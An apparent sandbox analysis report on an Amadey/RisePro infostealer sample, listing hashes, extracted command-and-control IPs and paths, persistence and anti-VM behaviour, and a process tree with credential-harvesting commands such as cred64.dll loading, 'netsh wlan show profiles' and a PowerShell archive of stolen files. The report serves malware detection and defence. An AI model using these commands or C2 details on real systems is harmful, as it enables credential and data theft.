Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
05/05/2024, 22:59 UTC
Behavioral task
behavioral1
Sample
c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
Resource
win10v2004-20240419-en
General
-
Target
c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
-
Size
1.6MB
-
MD5
b6be8ac990a242fb267ad389be0e9f80
-
SHA1
b653d64cdd79b1e72240090ea8be0d2fe6626cda
-
SHA256
c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585
-
SHA512
d5c2a9adaee0bb79e2d025f6003fdd846b1c3be48990ec3422b8c6c06baea2c7a989b8bd8cb3ee4b95235e14ede84771bf46b6b883998edbde6cbe8c58323015
-
SSDEEP
24576:k6vpDCULtpzNh6vaS3IpKu7yuHqmbucbqAcaFhv/M6qSQzRt9B1OeAP4oKx3QgSX:k6vhCUL3zNUyYjcLrt3cRHBaIQ8QWw
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
risepro
147.45.47.93:58709
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 46292a4ec2.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 36 4584 rundll32.exe 37 3812 rundll32.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 46292a4ec2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 46292a4ec2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe -
Executes dropped EXE 5 IoCs
pid Process 4640 explorta.exe 3516 amert.exe 2068 explorha.exe 1592 46292a4ec2.exe 2192 1e69eaa0ab.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Wine explorha.exe -
Loads dropped DLL 3 IoCs
pid Process 1884 rundll32.exe 4584 rundll32.exe 3812 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/2740-0-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/2740-3-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/2740-1-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/2740-7-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/2740-5-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/2740-4-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/2740-2-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/2740-6-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/files/0x001900000002ab49-13.dat themida behavioral2/memory/2740-20-0x0000000000710000-0x0000000000C08000-memory.dmp themida behavioral2/memory/4640-21-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/4640-25-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/4640-27-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/4640-26-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/4640-24-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/4640-23-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/4640-22-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/4640-28-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/files/0x0002000000025dae-66.dat themida behavioral2/memory/4640-80-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/1592-81-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-84-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-85-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-82-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-83-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-86-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-88-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-87-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/1592-89-0x0000000000BA0000-0x0000000001241000-memory.dmp themida behavioral2/memory/4640-152-0x0000000000E60000-0x0000000001358000-memory.dmp themida behavioral2/memory/1592-159-0x0000000000BA0000-0x0000000001241000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Microsoft\Windows\CurrentVersion\Run\46292a4ec2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\46292a4ec2.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Microsoft\Windows\CurrentVersion\Run\1e69eaa0ab.exe = "C:\\Users\\Admin\\1000021002\\1e69eaa0ab.exe" explorta.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 46292a4ec2.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0002000000025db5-94.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF chrome.exe File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF chrome.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3516 amert.exe 2068 explorha.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\explorha.job amert.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\explorta.job c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe -
pid Process 2176 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133594236047360723" chrome.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 3516 amert.exe 3516 amert.exe 2068 explorha.exe 2068 explorha.exe 5000 chrome.exe 5000 chrome.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 4584 rundll32.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 392 chrome.exe 392 chrome.exe 392 chrome.exe 392 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 5000 chrome.exe 5000 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe Token: SeCreatePagefilePrivilege 5000 chrome.exe Token: SeShutdownPrivilege 5000 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2740 c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 2192 1e69eaa0ab.exe 5000 chrome.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 5000 chrome.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe 2192 1e69eaa0ab.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2740 wrote to memory of 4640 2740 c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe 81 PID 2740 wrote to memory of 4640 2740 c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe 81 PID 2740 wrote to memory of 4640 2740 c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe 81 PID 4640 wrote to memory of 1140 4640 explorta.exe 82 PID 4640 wrote to memory of 1140 4640 explorta.exe 82 PID 4640 wrote to memory of 1140 4640 explorta.exe 82 PID 4640 wrote to memory of 3516 4640 explorta.exe 83 PID 4640 wrote to memory of 3516 4640 explorta.exe 83 PID 4640 wrote to memory of 3516 4640 explorta.exe 83 PID 3516 wrote to memory of 2068 3516 amert.exe 84 PID 3516 wrote to memory of 2068 3516 amert.exe 84 PID 3516 wrote to memory of 2068 3516 amert.exe 84 PID 4640 wrote to memory of 1592 4640 explorta.exe 85 PID 4640 wrote to memory of 1592 4640 explorta.exe 85 PID 4640 wrote to memory of 1592 4640 explorta.exe 85 PID 4640 wrote to memory of 2192 4640 explorta.exe 86 PID 4640 wrote to memory of 2192 4640 explorta.exe 86 PID 4640 wrote to memory of 2192 4640 explorta.exe 86 PID 2192 wrote to memory of 5000 2192 1e69eaa0ab.exe 87 PID 2192 wrote to memory of 5000 2192 1e69eaa0ab.exe 87 PID 5000 wrote to memory of 3480 5000 chrome.exe 90 PID 5000 wrote to memory of 3480 5000 chrome.exe 90 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 4572 5000 chrome.exe 91 PID 5000 wrote to memory of 1996 5000 chrome.exe 92 PID 5000 wrote to memory of 1996 5000 chrome.exe 92 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93 PID 5000 wrote to memory of 1520 5000 chrome.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe"C:\Users\Admin\AppData\Local\Temp\c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2068 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main5⤵
- Loads dropped DLL
PID:1884 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4584 -
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\917890216844_Desktop.zip' -CompressionLevel Optimal7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main5⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:3812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000020001\46292a4ec2.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\46292a4ec2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1592
-
-
C:\Users\Admin\1000021002\1e69eaa0ab.exe"C:\Users\Admin\1000021002\1e69eaa0ab.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0x84,0x108,0x7ffb2abccc40,0x7ffb2abccc4c,0x7ffb2abccc585⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1836 /prefetch:25⤵PID:4572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2120 /prefetch:35⤵PID:1996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2576 /prefetch:85⤵PID:1520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3124 /prefetch:15⤵PID:2244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3208 /prefetch:15⤵PID:1272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4536,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4552 /prefetch:85⤵PID:4984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4464,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4636 /prefetch:85⤵PID:4840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4580,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4932 /prefetch:85⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:392
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:4784
-
